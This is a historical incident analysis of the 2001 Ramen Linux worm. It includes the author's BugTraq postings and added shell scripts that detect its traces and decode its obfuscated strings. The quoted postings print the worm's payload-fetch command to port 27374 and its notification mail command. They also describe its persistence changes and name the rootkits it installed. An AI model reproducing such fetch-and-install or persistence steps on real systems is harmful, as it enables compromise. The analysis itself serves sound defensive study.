Ramen Worm Analysis

In 2001 I caught, analyzed and dissected the first self-replicating Linux malware, which was given the name Ramen Worm. At the time, articles appeared in all the major online publications. This analysis is kept here primarily for historical reasons.

Ramen Worm - General Details
==============================

1. Is this really a worm?
Yes it is.
2. Why?
It has the ability to replicate itself, and it does not infect executable files in order
to do so, so it cannot be considered a virus.
3. Replication technique:
It scans whole networks (random class B networks, XXX.XXX.0.0/255.255.0.0) in order to find vulnerable systems.
Once a vulnerable system is found it takes control of it (the worm has root access on the compromised machine),
copies itself to the target, and starts scanning from there.

4. Vulnerabilities exploited by the worm
wu-ftpd version 2.6.0 (format string vulnerability, remote root)
LPRng format string vulnerability
rpc.statd format string vulnerability

5. Systems affected
Strings found in the worm indicate that the following systems are targeted:
Redhat 6.0 - (knfsd-1.2.2-4)
Redhat 6.1 - (knfsd-1.4.7-7)
Redhat 6.2 - (nfs-utils-0.1.6-2)
RedHat 7.0 - Guinesss-dev
RedHat 7.0 - Guinesss
but any other Linux system running wu-ftpd 2.6.0 or a vulnerable rpc.statd can be affected.

6. Systems that are not affected
Win 9x, Win NT, Win 2000
Non-x86 Unixes.

7. Worm effects
a) Once a system is compromised the worm finds and replaces every index.html file with a copy carried inside the worm.
b) It disables anonymous FTP access on the compromised machine (in my opinion this is a "bug" in the worm).
c) It disables and erases rpc.statd on the compromised machine.
d) It disables and erases the lpd daemon on the compromised machine, so printing from that machine becomes impossible.
e) It modifies inetd.conf on RedHat 6.x and xinetd.conf on RedHat 7.0 and installs a fake web server
on a non-standard port (in my opinion it may also contain a buffer overflow that is exploitable
remotely, but I could not prove that yet). Installing this server is what allows the worm to spread:
the postings below show a new victim fetching the worm tarball from it on port 27374.
f) It removes /etc/hosts.deny.
g) It modifies /etc/rc.d/rc.sysinit so that the worm is started every time the machine is rebooted.
h) It sends mail to the following addresses (these two addresses and the password "bl3h" are stored encrypted in the worm):
   gb31337@hotmail.com
   gb31337@yahoo.com
i) Once the worm starts scanning it consumes a large amount of your Internet bandwidth. The scanning is very fast because
it uses SYN scanning (the synscan technique).
j) Once the system is rebooted it restarts scanning.

8. Spreading
The worm spreads very fast because of its class B network scanning. On our network (10 Mbit/s)
the hub was saturated and the whole bandwidth was consumed. It scanned two class B networks in 15 minutes.

9. Danger
The worm itself is dangerous because of the network bandwidth it consumes, and because of the possibility (not proved yet)
that the worm author can remotely access the compromised box.

10. Percentage of boxes vulnerable
Many boxes are vulnerable. It is quite common for Redhat 6.2 or Redhat 7.0 to be installed "standard", which makes
them vulnerable to this worm. My estimate is that in a class B network the worm will find at least 10-20 vulnerable boxes.
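As an added example, not part of the original analysis and not the worm's own code, here is a POSIX shell function that checks a host (or a disk image mounted under a given root) for the traces listed under item 7: the /usr/src/.poop drop directory and the /sbin/asp binary that the postings below name, a removed /etc/hosts.deny, and worm entries in inetd.conf, xinetd.conf, the /etc/xinetd.d directory that RedHat 7 also uses, and rc.sysinit. The patterns it greps for (`/sbin/asp`, the port `27374`, `.poop`) are assumptions about what those entries contain, since the page does not quote them, and a missing hosts.deny is only meaningful on a system that shipped one.

```shell
#!/bin/sh
# Added example: host-side indicator check for the Ramen worm traces
# described in this analysis. Not part of the original analysis and not
# the worm's code.
#
# Usage: ramen_check [ROOT]
#   ROOT is an optional mount point of a disk image or a constructed tree;
#   with no argument the live filesystem is inspected. One line is printed
#   on stdout per indicator found, a summary goes to stderr, and the
#   function always returns 0 so it is safe to call under `set -e`.
ramen_check() {
    root=${1:-}
    hits=0

    # Drop directory and fake web server binary named in the postings below.
    if [ -d "$root/usr/src/.poop" ]; then
        echo "drop directory present: /usr/src/.poop"
        hits=$((hits + 1))
    fi
    if [ -f "$root/sbin/asp" ]; then
        echo "fake web server binary present: /sbin/asp"
        hits=$((hits + 1))
    fi

    # The worm removes /etc/hosts.deny; a stock RedHat install ships one.
    if [ ! -f "$root/etc/hosts.deny" ]; then
        echo "/etc/hosts.deny missing"
        hits=$((hits + 1))
    fi

    # inetd.conf (RedHat 6.x), xinetd.conf (RedHat 7.0) and rc.sysinit are
    # modified by the worm; /etc/xinetd.d is checked too because RedHat 7
    # splits services into it. The patterns are an assumption about what
    # the worm's entries contain: the /sbin/asp path, the 27374 port, or
    # the drop directory.
    for f in "$root/etc/inetd.conf" "$root/etc/xinetd.conf" \
             "$root/etc/rc.d/rc.sysinit" "$root"/etc/xinetd.d/*; do
        [ -f "$f" ] || continue
        if grep -q -e '/sbin/asp' -e '27374' -e '\.poop' "$f"; then
            echo "worm entry in ${f#"$root"}"
            hits=$((hits + 1))
        fi
    done

    echo "indicators found: $hits" >&2
    return 0
}
```

Run it as root on a suspect box, or better, against a mounted image (`ramen_check /mnt/victim`), so the check does not depend on the compromised system's own kernel and tools: an LKM rootkit such as the Adore found on the honeypot in the second posting below can hide files and processes from anything run on the live system.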

My Original postings to BugTraq:
================================

=================================================================================
=================================================================================

Subject:
  sunrpc / wu-ftpd worm ?
Date:
  Mon, 15 Jan 2001 22:41:50 +0200
From:
  Mihai Moldovanu mihaim AT PROFM dot RO
Organization:
  Radio ProFM
To:
  INCIDENTS at SECURITYFOCUS DOT COM
References:
  1

Cristian Dumitrescu wrote:

> Hey
> I've been experiencing the same kind of scans in the last 2 weeks, with
> increased density in the last days, from these ip addreses:
>
> 211.120.63.136
> 213.154.132.122
> 210.205.6.215
> 24.114.48.24
> 62.83.125.82
> 193.231.199.4
> 193.40.223.66
> 65.3.3.83
> 193.230.227.234
> > 24.26.121.156
> > 24.168.66.119
> > 64.31.226.156
> > 142.169.227.102
> > 193.226.15.15
> > 211.218.144.11

Same problems here:
38.232.191.200
24.169.70.243
194.102.254.118
63.146.209.50

But the most interesting is:
130.111.148.69 which seems to be a worm launcher site.
It will connect to the target machine on 111 or 21 and will exploit the well known
rpc.statd and wu-ftp 2.6.0 bug to gain root on the remote machine.

The tar itself is downloaded from that machine on port 27374.

" lynx -source http://%s:27374 > /usr/src/.poop/ramen.tgz "

After a successful install it seems it will send a mail with the command:
" echo Eat Your Ramen! | mail -s % % " to some obscure hotmail.com account.

It seems that it has some sort of class B scanner and exploits for rpc.statd and
wu-ftpd.

If anyone is interested in taking a deeper look at it mail me and I will send
the .tgz, or you can get it from the site I mentioned above.

Best Regards,

--
Lead programmer,
Mihai Moldovanu (mihaim at profm dot ro)
WEB:    http://tfm.profm.ro/
        http://www.slashdot.ro/

=================================================================================
=================================================================================

Subject:
  Re: anyone else seen an increase in sunrpc scans these days?
Date:
  Mon, 15 Jan 2001 14:40:16 +0200
From:
  Mihai Moldovanu mihaim at profm dot ro
Organization:
  Radio ProFM
To:
  INCIDENTS at SECURITYFOCUS dot COM
References:
  1

Jason Lewis wrote:

> I couldn't find any of those addresses, but I have similar scans in my logs.
>
> 63.91.6.36
> 64.32.209.213
> 64.21.114.2
> 66.22.62.2
> 216.98.160.251

Yes. The same problem here. But not only 111, 21 also.
We deployed a honeypot and waited to be compromised. It took 12 hours to be
compromised. I took it out of the network and this is what I found on it:
It seems like a worm that installs StatDXscan (class B rpc.statd scanner), a
wu-ftpd scanner, a modified t0rn rootkit along with the Adore LKM rootkit, and
flood tools (Sl2, smurf5, a trojaned sshd running on port 48480).
t0rnscan has inside it the following string: irc.webbernet.net:6667

--
Lead programmer,
Mihai Moldovanu (mihaim at profm dot ro)
WEB:    http://tfm.profm.ro/
        http://www.developers.ro/

=================================================================================
=================================================================================
Subject:
  Ramen worm . More details on it. ( found a password and e-mails crypted inside it)
Date:
  Tue, 16 Jan 2001 22:19:30 +0200
From:
  Mihai Moldovanu mihaim at profm dot ro
Organization:
  Radio ProFM
To:
  INCIDENTS at SECURITYFOCUS dot COM
References:
  1

I completed reverse engineering the Ramen worm. There are 3 encrypted text
messages in the worm:
2 are email addresses:
Decrypted: "gb31337@hotmail.com",  in executable -> "fa20226?gnsl`hk-bnl"
Decrypted: "gb31337@yahoo.com",    in executable -> "fa20226?x`gnn-bnl"
and an encrypted password:
Decrypted: "bl3h",                 in executable -> "ak2g"
These texts can be found in almost all ELF worm executables.
The encryption algorithm is very easy.

For each character in the encrypted text add 1 and you will obtain the plain text.
I used the following C code to decrypt:

for (i = 0; i < strlen(text); i++) text[i] = text[i] + 1;

The asp executable (the one which gets installed in /sbin/asp and serves
requests on 27374) has a strange getline function coded which
seems to be specially crafted to allow remote upload/execution of code.
Unfortunately I can't prove that the function has a buffer
overflow in it.

--
Lead programmer,
Mihai Moldovanu (mihaim at profm dot ro)
WEB:    http://www.tfm.ro
        http://linux.tfm.ro
        http://portal.tfm.ro
        http://www.slashdot.ro
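The +1 rule from the posting above, as an added example in shell (this is neither the poster's C code nor the worm's): a decoder, its inverse, and a scan that pulls printable runs out of a binary, shifts them, and keeps the ones that decode to an e-mail address. The minimum run length of 4 bytes, the e-mail pattern, and the sample input used in the usage note are choices of this example, not anything taken from the worm.

```shell
#!/bin/sh
# Added example: decode the Ramen worm's obfuscated strings. Not the
# worm's code and not the original poster's code; it applies the +1
# rule described in the posting above.

# The worm stores each string with every byte decremented by one, so
# decoding is a shift of every printable ASCII character up by one.
# tr maps the range ' '..'}' onto '!'..'~' position by position, which
# is the same operation as text[i] = text[i] + 1 over printable bytes.
ramen_decode() {
    printf '%s' "$1" | tr '\040-\175' '\041-\176'
}

# The inverse, giving the form in which a string sits in the binary
# (the worm author's encoder, reconstructed from the +1 rule).
ramen_encode() {
    printf '%s' "$1" | tr '\041-\176' '\040-\175'
}

# Scan a binary for obfuscated strings: pull out printable runs of at
# least MINLEN bytes (a portable stand-in for strings(1)), shift every
# run, and keep the results that look like e-mail addresses. Runs that
# decode to something else are dropped, so plain strings in the binary
# do not produce noise.
ramen_strings() {
    file=$1
    minlen=${2:-4}
    tr -c '\040-\176' '\n' < "$file" \
        | grep -E '^.{'"$minlen"',}$' \
        | tr '\040-\175' '\041-\176' \
        | grep -E '^[^@]+@[^@]+\.[^@]+$'
}
```

Usage: `ramen_decode 'ak2g'` prints `bl3h`, and `ramen_strings /sbin/asp` run on a captured copy of the worm binary lists the decoded mailbox addresses without first locating the encoding routine in the disassembly.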